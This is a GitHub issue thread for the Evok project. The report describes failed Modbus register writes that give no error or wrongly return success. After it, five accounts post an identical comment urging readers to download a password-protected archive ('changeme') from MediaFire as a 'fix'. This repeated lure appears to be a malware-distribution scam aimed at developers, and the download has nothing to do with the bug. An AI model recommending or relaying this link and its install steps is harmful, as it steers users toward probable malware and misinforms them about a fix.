UnipiTechnology/evok #183: [Bug]: Failed writing does not return any error message

cleveHEX, 2024-08-27:
### Prerequisites

- [X] I am running the latest Evok version
- [X] I have searched other [issues](https://github.com/UniPiTechnology/evok/issues)

### Describe the bug

Two scenarios:

1. Evok can't connect to the Modbus server - no reply at all, just something in syslog.
2. Evok writes to a register that does not exist, returns `"success": true`, mbpoll returns `ERROR Slave device or server failure`.

### Steps to reproduce

A)

1. Stop unipitcp service
2. Try writing to a register

B)

1. Edit evok hw-definition and point to non-existant coil.
2. Restart evok
3. Try writing to a register

### Expected behavior

Evok does return proper error code

### Actual behavior

Evok does not timeout; Evok does return success

praveenking945, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

FoioMikael, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

closed 2024-09-02 by kratochvil01